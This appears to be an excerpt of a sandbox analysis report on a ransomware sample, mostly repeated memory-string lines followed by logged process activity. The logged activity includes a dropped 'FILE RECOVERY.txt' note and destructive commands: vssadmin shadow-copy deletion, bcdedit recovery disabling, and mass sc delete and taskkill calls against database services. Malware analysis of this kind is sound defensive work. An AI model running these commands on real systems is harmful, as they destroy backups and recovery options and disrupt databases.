        Source: malware.exe, 00000000.00000003.1753956972.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs malware.exe
        Source: malware.exe, 00000000.00000003.1753956972.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1796662055.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2234598919.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1677352666.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs malware.exe
        Source: malware.exe, 00000000.00000003.1677352666.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1680940988.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs malware.exe
        Source: malware.exe, 00000000.00000003.1680940988.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1647424477.0000000000E21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs malware.exe
        Source: malware.exe, 00000000.00000003.2219665386.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1645556240.0000000000E21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1645556240.0000000000E21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs malware.exe
        Source: malware.exe, 00000000.00000003.1794933942.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1778521424.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2307293284.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2319319382.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1647424477.0000000000E2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs malware.exe
        Source: malware.exe, 00000000.00000003.2277969165.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1671748805.0000000000E21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs malware.exe
        Source: malware.exe, 00000000.00000003.1672247120.0000000000E2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs malware.exe
        Source: malware.exe, 00000000.00000003.1672247120.0000000000E2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1771670943.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1691543282.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs malware.exe
        Source: malware.exe, 00000000.00000003.1691543282.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2310414513.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2205959324.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1787591806.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2500262981.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2203914994.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1793900189.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2208007561.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1646452673.0000000000E21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1646452673.0000000000E21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs malware.exe
        Source: malware.exe, 00000000.00000003.2502212669.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2325775812.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1646643464.0000000000E21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs malware.exe
        Source: malware.exe, 00000000.00000003.2318242633.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2214749280.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1672941763.0000000000E21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs malware.exe
        Source: malware.exe, 00000000.00000003.1679732093.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs malware.exe
        Source: malware.exe, 00000000.00000003.1679732093.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2301013019.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2288763877.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1784458150.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1672941763.0000000000E2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs malware.exe
        Source: malware.exe, 00000000.00000003.1672941763.0000000000E2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2192043615.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1683714904.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs malware.exe
        Source: malware.exe, 00000000.00000003.1683714904.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1733072833.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs malware.exe
        Source: malware.exe, 00000000.00000003.1733072833.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1754864885.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1789269676.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2285385346.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2225775706.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2223674952.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1680382637.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs malware.exe
        Source: malware.exe, 00000000.00000003.1680382637.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2291059360.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2295076254.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1713437758.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs malware.exe
        Source: malware.exe, 00000000.00000003.1713437758.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2331151163.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2225220813.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1687806460.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs malware.exe
        Source: malware.exe, 00000000.00000003.1687806460.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1780299229.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2520951632.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1671748805.0000000000E2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs malware.exe
        Source: malware.exe, 00000000.00000003.1671748805.0000000000E2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2503400133.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2273683265.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1807519561.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1647825175.0000000000E21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs malware.exe
        Source: malware.exe, 00000000.00000003.1757932692.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2201875066.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2248820205.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2243899749.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2210786693.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1761391299.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2181517478.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1672437931.0000000000E2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs malware.exe
        Source: malware.exe, 00000000.00000003.1672437931.0000000000E2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2267404545.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2250763069.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1788754184.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1683933742.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs malware.exe
        Source: malware.exe, 00000000.00000003.1683933742.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1690435894.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs malware.exe
        Source: malware.exe, 00000000.00000003.1690435894.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1756240349.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1781641354.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1672437931.0000000000E21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs malware.exe
        Source: malware.exe, 00000000.00000003.2255304707.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1684859104.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs malware.exe
        Source: malware.exe, 00000000.00000003.1684859104.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2245601475.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2322707331.0000000000E11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2241039765.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1646643464.0000000000E2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs malware.exe
        Source: malware.exe, 00000000.00000003.1786468214.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1685802067.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs malware.exe
        Source: malware.exe, 00000000.00000003.1685802067.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1688687962.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs malware.exe
        Source: malware.exe, 00000000.00000003.1688687962.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2296284429.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1806957127.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2193372519.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2316107109.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2242859977.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2262573550.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1672247120.0000000000E21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs malware.exe
        Source: malware.exe, 00000000.00000003.1685954140.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs malware.exe
        Source: malware.exe, 00000000.00000003.1685954140.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2276982539.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2373819882.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1758968149.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2524145663.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2271073219.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1685212802.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs malware.exe
        Source: malware.exe, 00000000.00000003.1685212802.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2217917248.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2517916860.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1801294445.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.2238638727.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs malware.exe
        Source: malware.exe, 00000000.00000003.1647825175.0000000000E2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs malware.exe
        Source: malware.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: classification engineClassification label: mal100.rans.spyw.evad.winEXE@16/1027@2/5
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06Jump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5932:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:648:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1420:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6284:120:WilError_03
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Documents and Settings\All Users\Microsoft\Diagnosis\Temp\DiagTrackTraceSlot_alternativeTrace\FILE RECOVERY.txtJump to behavior
        Source: malware.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\malware.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\malware.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: malware.exeReversingLabs: Detection: 100%
        Source: malware.exeVirustotal: Detection: 82%
        Source: unknownProcess created: C:\Users\user\Desktop\malware.exe "C:\Users\user\Desktop\malware.exe"
        Source: C:\Users\user\Desktop\malware.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
        Source: C:\Users\user\Desktop\malware.exeProcess created: C:\Windows\System32\vssadmin.exe "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet
        Source: C:\Users\user\Desktop\malware.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\vssadmin.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\malware.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc delete "MSSQLFDLauncher"
        Source: unknownProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FILE RECOVERY.txt
        Source: C:\Users\user\Desktop\malware.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailuresJump to behavior
        Source: C:\Users\user\Desktop\malware.exeProcess created: C:\Windows\System32\vssadmin.exe "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quietJump to behavior
        Source: C:\Users\user\Desktop\malware.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exeJump to behavior
        Source: C:\Users\user\Desktop\malware.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled noJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc delete "MSSQLFDLauncher"Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Users\user\Desktop\malware.exeSection loaded: iphlpapi.dllJump to behavior
